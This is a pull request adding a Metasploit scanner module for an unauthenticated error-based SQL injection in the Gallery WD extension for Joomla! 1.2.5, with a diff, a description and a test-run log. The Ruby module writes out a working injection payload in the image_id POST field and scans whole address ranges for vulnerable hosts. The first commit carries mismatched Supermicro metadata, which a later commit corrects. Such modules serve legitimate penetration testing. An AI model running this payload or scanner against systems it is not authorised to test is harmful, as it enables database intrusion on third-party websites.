### PR TITLE
Webdorado gallery wd 1.2.5 unauthenticated error-based SQL injection scanner

### DIFF
--- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb
+++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb
@@ -1,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => '',
+      'Description' => %q{
+      },
+      'Author'       =>
+        [
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-3621' ],
+          [ 'CVE', '2013-3623' ],
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities']
+        ],
+      'DisclosureDate' => 'Nov 06 2013'))
+
+  end
+
+  def run_host(ip)
+
+    left_marker = Rex::Text.rand_text_alpha(5)
+    right_marker = Rex::Text.rand_text_alpha(5)
+    flag = Rex::Text.rand_text_alpha(5)
+
+    vprint_status("#{peer} - Checking host")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'vars_get' => {
+        'option' => 'com_gallery_wd',
+        'view' => 'gallerybox',
+        'image_id' => '-1',
+        'gallery_id' => '-1',
+        'thumb_width' => '180',
+        'thumb_height' => '90',
+        'open_with_fullscreen' => 0,
+        'image_width' => 800,
+        'image_height' => 500,
+        'image_effect' => 'fade',
+        'sort_by' => 'order',
+        'order_by' => 'asc',
+        'enable_image_filmstrip' => '',
+        'image_filmstrip_height' => 0,
+        'enable_image_ctrl_btn' => 1,
+        'enable_image_fullscreen' => 1,
+        'popup_enable_info' => 1,
+        'popup_info_always_show' => 0,
+        'popup_hit_counter' => 0,
+        'popup_enable_rate' => 0,
+        'slideshow_interval' => 5,
+        'enable_comment_social' => '',
+        'enable_image_facebook' => '',
+        'enable_image_twitter' => '',
+        'enable_image_google' => '',
+        'enable_image_pinterest' => '',
+        'enable_image_tumblr' => '',
+        'watermark_type' => 'none'
+      },
+      'vars_post' => {
+        'image_id' => "1 AND (SELECT 2425 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
+        'rate' => '',
+        'ajax_task' => 'save_hit_count',
+        'task' => 'gallerybox.ajax_search'
+      }
+    })
+
+    unless res && res.body
+      vprint_error("#{peer} - Server did not respond in an expected way")
+      return
+    end
+
+    result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
+
+    if result
+      print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)")
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Supermicro Onboard IPMI close_window.cgi Buffer Overflow",
+        :refs  => self.references.select { |ref| ref.ctx_val == "2013-3623" }
+      })
+    end
+
+  end
+
+end

--- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb
+++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb
@@ -14,27 +14,31 @@ class Metasploit4 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => '',
+      'Name'        => 'Gallery WD for Joomla! Unauthenticated SQL Injection Scanner',
       'Description' => %q{
+      This module will scan for Joomla! instances vulnerable to an unauthenticated SQL injection
+      within the Gallery WD for Joomla! extension version 1.2.5 and likely prior.
       },
       'Author'       =>
         [
+          'CrashBandicoot', #independent discovery/0day drop
+          'bperry' #discovery/metasploit module
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', '2013-3621' ],
-          [ 'CVE', '2013-3623' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities']
+          [ 'EDB', '36563']
         ],
-      'DisclosureDate' => 'Nov 06 2013'))
+      'DisclosureDate' => 'Mar 30 2015'))
 
+    register_options([
+      OptString.new('TARGETURI', [true, 'Target URI of the Joomla! instance', '/'])
+    ], self.class)
   end
 
   def run_host(ip)
-
-    left_marker = Rex::Text.rand_text_alpha(5)
     right_marker = Rex::Text.rand_text_alpha(5)
+    left_marker = Rex::Text.rand_text_alpha(5)
     flag = Rex::Text.rand_text_alpha(5)
 
     vprint_status("#{peer} - Checking host")
@@ -88,13 +92,13 @@ class Metasploit4 < Msf::Auxiliary
     result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
 
     if result
-      print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)")
+      print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!")
       report_vuln({
         :host  => rhost,
         :port  => rport,
         :proto => 'tcp',
-        :name  => "Supermicro Onboard IPMI close_window.cgi Buffer Overflow",
-        :refs  => self.references.select { |ref| ref.ctx_val == "2013-3623" }
+        :name  => "Unauthenticated error-based SQL injection in Gallery WD for Joomla!",
+        :refs  => self.references.select { |ref| ref.ctx_val == "36563" }
       })
     end
 


### PR DESCRIPTION
The following module will scan for an unauthenticated error-based SQL injection within the Gallery WD for Joomla! plugin.

Funny enough, I was in the process of disclosing this vulnerability to the vendor when this was dropped as an 0day on Full Disclosure, so might as well make the PR for the module.

http://www.exploit-db.com/exploits/36563/

Test run:

```
msf auxiliary(joomla_gallerywd_sqli_scanner) > show options

Module options (auxiliary/scanner/http/joomla_gallerywd_sqli_scanner):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       Target URI of the Joomla! instance
   THREADS    10               yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_gallerywd_sqli_scanner) > run

[*] Scanned  27 of 256 hosts (10% complete)
[+] 192.168.1.38:80 - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  85 of 256 hosts (33% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(joomla_gallerywd_sqli_scanner) > 
```

Passes msftidy:

```
$ tools/msftidy.rb modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb 
$ 
```
